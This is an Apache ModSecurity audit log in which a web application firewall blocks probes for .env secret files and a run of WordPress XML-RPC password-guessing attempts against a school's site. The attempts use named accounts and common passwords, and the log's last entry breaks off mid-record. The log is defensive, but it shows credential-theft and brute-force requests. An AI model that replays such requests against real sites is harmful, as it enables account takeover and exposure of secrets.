Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bee1005f-Z--
--76a8c210-A--
[24/Apr/2025:23:57:54 +0700] aAptkt5yz20UX9VrdZPHlQAAAEQ 103.236.140.4 43226 103.236.140.4 8181
--76a8c210-B--
GET /.env.preprod HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.97
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.97
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--76a8c210-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--76a8c210-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745513874318226 746 (- - -)
Stopwatch2: 1745513874318226 746; combined=314, p1=262, p2=0, p3=0, p4=0, p5=51, sr=76, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--76a8c210-Z--
--26f4946c-A--
[24/Apr/2025:23:57:54 +0700] aAptkslQo524fhbIj1yHVAAAAA4 103.236.140.4 43248 103.236.140.4 8181
--26f4946c-B--
GET /config/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.97
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.97
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--26f4946c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--26f4946c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745513874911692 820 (- - -)
Stopwatch2: 1745513874911692 820; combined=307, p1=270, p2=0, p3=0, p4=0, p5=36, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--26f4946c-Z--
--3f599634-A--
[24/Apr/2025:23:57:55 +0700] aAptk95yz20UX9VrdZPHlgAAAFA 103.236.140.4 43264 103.236.140.4 8181
--3f599634-B--
GET /.env_sample HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.97
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.97
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--3f599634-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3f599634-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745513875330822 1167 (- - -)
Stopwatch2: 1745513875330822 1167; combined=357, p1=290, p2=0, p3=0, p4=0, p5=67, sr=80, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3f599634-Z--
--e9c46728-A--
[24/Apr/2025:23:57:55 +0700] aAptk8lQo524fhbIj1yHWgAAABI 103.236.140.4 43298 103.236.140.4 8181
--e9c46728-B--
GET /prod/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.148.10.97
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.148.10.97
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--e9c46728-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e9c46728-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745513875930964 753 (- - -)
Stopwatch2: 1745513875930964 753; combined=292, p1=255, p2=0, p3=0, p4=0, p5=36, sr=73, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e9c46728-Z--
--25d25f15-A--
[24/Apr/2025:23:58:28 +0700] aApttPiVYlyO1xhz7yOw-gAAAMc 103.236.140.4 44606 103.236.140.4 8181
--25d25f15-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--25d25f15-C--
wp.getUsersBlogs
wakasarpras
nimda
--25d25f15-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--25d25f15-E--
--25d25f15-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513908061559 5299 (- - -)
Stopwatch2: 1745513908061559 5299; combined=3824, p1=446, p2=3199, p3=0, p4=0, p5=104, sr=86, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--25d25f15-Z--
--ced65622-A--
[24/Apr/2025:23:59:28 +0700] aApt8PiVYlyO1xhz7yOxzQAAAMw 103.236.140.4 47172 103.236.140.4 8181
--ced65622-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ced65622-C--
wp.getUsersBlogs
wakasarpras
admin!@#
--ced65622-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ced65622-E--
--ced65622-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513968301345 5403 (- - -)
Stopwatch2: 1745513968301345 5403; combined=3819, p1=443, p2=3203, p3=0, p4=0, p5=101, sr=85, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ced65622-Z--
--d94cfc13-A--
[24/Apr/2025:23:59:33 +0700] aApt9clQo524fhbIj1yIQAAAABU 103.236.140.4 47380 103.236.140.4 8181
--d94cfc13-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d94cfc13-C--
wp.getUsersBlogs
wakasarpras
1234%^&*
--d94cfc13-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d94cfc13-E--
--d94cfc13-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745513973193984 4879 (- - -)
Stopwatch2: 1745513973193984 4879; combined=3896, p1=503, p2=3150, p3=0, p4=0, p5=138, sr=149, sw=105, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d94cfc13-Z--
--e74fab53-A--
[25/Apr/2025:00:00:28 +0700] aApuLMlQo524fhbIj1yI8QAAABU 103.236.140.4 49598 103.236.140.4 8181
--e74fab53-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e74fab53-C--
wp.getUsersBlogs
wakasarpras
chicken
--e74fab53-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e74fab53-E--
--e74fab53-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514028520181 5189 (- - -)
Stopwatch2: 1745514028520181 5189; combined=3701, p1=441, p2=3092, p3=0, p4=0, p5=98, sr=84, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e74fab53-Z--
--1e90471d-A--
[25/Apr/2025:00:01:28 +0700] aApuaGLuk3f9kLjsdTaGngAAAIU 103.236.140.4 52092 103.236.140.4 8181
--1e90471d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1e90471d-C--
wp.getUsersBlogs
wakasarpras
xbox360
--1e90471d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1e90471d-E--
--1e90471d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514088132236 4163 (- - -)
Stopwatch2: 1745514088132236 4163; combined=2747, p1=371, p2=2233, p3=0, p4=0, p5=83, sr=77, sw=60, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1e90471d-Z--
--f408bf24-A--
[25/Apr/2025:00:02:28 +0700] aApupGLuk3f9kLjsdTaHKAAAAIQ 103.236.140.4 54684 103.236.140.4 8181
--f408bf24-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f408bf24-C--
wp.getUsersBlogs
wakasarpras
manunited
--f408bf24-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f408bf24-E--
--f408bf24-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (119+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514148737962 5525 (- - -)
Stopwatch2: 1745514148737962 5525; combined=3864, p1=468, p2=3198, p3=0, p4=0, p5=113, sr=99, sw=85, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f408bf24-Z--
--a1e86116-A--
[25/Apr/2025:00:03:28 +0700] aApu4MlQo524fhbIj1yK3gAAAA8 103.236.140.4 56980 103.236.140.4 8181
--a1e86116-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a1e86116-C--
wp.getUsersBlogs
kasubagtu
kasubagtu1987
--a1e86116-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a1e86116-E--
--a1e86116-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (129+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514208025849 4435 (- - -)
Stopwatch2: 1745514208025849 4435; combined=3129, p1=393, p2=2591, p3=0, p4=0, p5=85, sr=80, sw=60, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a1e86116-Z--
--2e69fd6a-A--
[25/Apr/2025:00:04:28 +0700] aApvHN5yz20UX9VrdZPLTQAAAFc 103.236.140.4 59648 103.236.140.4 8181
--2e69fd6a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2e69fd6a-C--
wp.getUsersBlogs
kasubagtu
marketing2021
--2e69fd6a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2e69fd6a-E--
--2e69fd6a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514268189295 5330 (- - -)
Stopwatch2: 1745514268189295 5330; combined=3827, p1=452, p2=3182, p3=0, p4=0, p5=123, sr=94, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2e69fd6a-Z--
--f32b0f27-A--
[25/Apr/2025:00:05:28 +0700] aApvWGLuk3f9kLjsdTaJOAAAAJE 103.236.140.4 34008 103.236.140.4 8181
--f32b0f27-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f32b0f27-C--
wp.getUsersBlogs
kasubagtu
qweasd
--f32b0f27-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f32b0f27-E--
--f32b0f27-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514328165496 5276 (- - -)
Stopwatch2: 1745514328165496 5276; combined=3778, p1=448, p2=3153, p3=0, p4=0, p5=103, sr=89, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f32b0f27-Z--
--596c2c39-A--
[25/Apr/2025:00:06:28 +0700] aApvlGLuk3f9kLjsdTaKKgAAAI0 103.236.140.4 36576 103.236.140.4 8181
--596c2c39-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--596c2c39-C--
wp.getUsersBlogs
kasubagtu
456321
--596c2c39-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--596c2c39-E--
--596c2c39-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514388308988 4872 (- - -)
Stopwatch2: 1745514388308988 4872; combined=3417, p1=478, p2=2777, p3=0, p4=0, p5=94, sr=143, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--596c2c39-Z--
--9ee55670-A--
[25/Apr/2025:00:07:16 +0700] aApvxN5yz20UX9VrdZPNRAAAAE4 103.236.140.4 38592 103.236.140.4 8181
--9ee55670-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9ee55670-C--
wp.getUsersBlogs
kasubagtu
1234%^&*
--9ee55670-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9ee55670-E--
--9ee55670-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514436296778 6323 (- - -)
Stopwatch2: 1745514436296778 6323; combined=4577, p1=614, p2=3754, p3=0, p4=0, p5=124, sr=161, sw=85, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9ee55670-Z--
--67f2e141-A--
[25/Apr/2025:00:07:28 +0700] aApv0MlQo524fhbIj1yNjgAAAAc 103.236.140.4 39088 103.236.140.4 8181
--67f2e141-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 231
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--67f2e141-C--
wp.getUsersBlogs
kasubagtu
administrator123
--67f2e141-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--67f2e141-E--
--67f2e141-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (118+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514448080834 5439 (- - -)
Stopwatch2: 1745514448080834 5439; combined=3911, p1=467, p2=3273, p3=0, p4=0, p5=100, sr=87, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--67f2e141-Z--
--181e7b76-A--
[25/Apr/2025:00:08:28 +0700] aApwDGLuk3f9kLjsdTaLVAAAAJA 103.236.140.4 41532 103.236.140.4 8181
--181e7b76-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--181e7b76-C--
wp.getUsersBlogs
kasubagtu
mustang
